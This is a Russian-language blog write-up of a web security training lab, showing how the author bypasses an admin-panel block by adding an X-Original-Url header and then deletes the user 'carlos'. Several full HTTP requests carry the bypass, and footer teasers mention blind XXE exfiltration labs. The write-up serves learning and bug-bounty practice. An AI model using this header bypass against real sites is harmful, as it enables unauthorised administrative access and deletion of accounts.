Kir 'cu63'

Работаю вирусным аналитиком уже 3 года. Хочу вкатиться в Баг Баунти, поэтому изучаю веб уязвимости и описываю свой путь в данном блоге. Присоединяйтеся:3

Для прохождения нужно зайти в панель администратора и удалить пользователя carlos.

https://0a2600a604ab062180e8852a0058005c.web-security-academy.net/

Solution

О как. Есть ссылка на панель админа, но у меня нет к ней доступа.

https://0a2600a604ab062180e8852a0058005c.web-security-academy.net/admin

Видим, что блокируют запросы по этому URL:

GET / HTTP/2
Host: 0a2600a604ab062180e8852a0058005c.web-security-academy.net
Cookie: session=eknFKHZZHexxMzkwExN9i09JYw0RhXoo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a2600a604ab062180e8852a0058005c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Попробую добавить заголовок X-Original-URL или X-Rewrite-URL. Они используются для изменения оригинального URL в запросе некоторыми фреймворками.

GET / HTTP/2
Host: 0a2600a604ab062180e8852a0058005c.web-security-academy.net
Cookie: session=eknFKHZZHexxMzkwExN9i09JYw0RhXoo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a2600a604ab062180e8852a0058005c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Original-Url: /admin

Ответ получен:

IMG

Найду энпоинт для удаления пользователя:

/admin/delete?username=carlos

Соберу запрос:

GET /?username=carlos HTTP/2
Host: 0a2600a604ab062180e8852a0058005c.web-security-academy.net
Cookie: session=eknFKHZZHexxMzkwExN9i09JYw0RhXoo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a2600a604ab062180e8852a0058005c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Original-Url: /admin/delete

Успех)

IMG

You May Also Enjoy

Exploiting blind XXE to exfiltrate data using a malicious external DTD

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, необходимо получит...

Exploiting blind XXE to retrieve data via error messages

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, нужно использовать...